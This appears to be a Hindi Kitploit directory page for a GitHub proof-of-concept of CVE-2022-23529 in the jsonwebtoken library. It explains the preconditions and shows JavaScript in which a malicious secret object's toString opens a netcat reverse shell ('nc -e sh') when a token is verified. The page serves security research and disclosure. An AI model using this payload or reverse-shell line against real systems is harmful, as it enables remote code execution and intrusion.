Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-23529-Exploration — CVE-2022-23529 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, दुर्भावनापूर्ण HMAC गुप्त वस्तुओं के माध्यम से कमजोर JWT लाइब्रेरीज़ में RCE प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/daniel-marchi/cve-2022-23529-exploration
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubdaniel-marchi/cve-2022-23529-exploration

CVE-2022-23529-Exploration

CVE-2022-23529 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, दुर्भावनापूर्ण HMAC गुप्त वस्तुओं के माध्यम से कमजोर JWT लाइब्रेरीज़ में RCE प्रदर्शित करता है।

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-23529

JSON वेब टोकन (JWT) लाइब्रेरी के संस्करण 3.4.6, 4.0.4, और 4.1.5 से पहले के संस्करण RCE के प्रति संवेदनशील हैं।

HMAC हैशिंग फ़ंक्शन किसी भी स्ट्रिंग को इनपुट के रूप में लेते हैं, जिससे RCE होता है।

पूर्व शर्तों के कारण, इस कमजोरी का शोषण होने की संभावना नहीं है।

इस कमजोरी का शोषण करने के लिए, एक हमलावर को निम्नलिखित में से एक शर्त सत्य होनी चाहिए:

  • सर्वर गुप्त कुंजियों को सुरक्षित रूप से संग्रहीत नहीं करता है।
  • हमलावर के पास गुप्त कुंजियों तक पहुंच और उन पर नियंत्रण होना चाहिए।

npm install [email protected]

var jwt = require('jsonwebtoken');

सर्वर के गुप्त का उपयोग करके एक टोकन बनाएं

var token = jwt.sign({"x":"y"}, 'servers_secret');

एक दुर्भावनापूर्ण ऑब्जेक्ट बनाएं जिसमें रिवर्स शेल हो (node.js)

root@kitploit:~
var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 127.0.0.1 9001');
        });
        process.exit(0)
    }
}

सर्वर गुप्त के रूप में संग्रहीत दुर्भावनापूर्ण ऑब्जेक्ट का उपयोग करके टोकन सत्यापित करता है

jwt.verify(token, poisoned_secret_on_server);

टूल डाउनलोड करें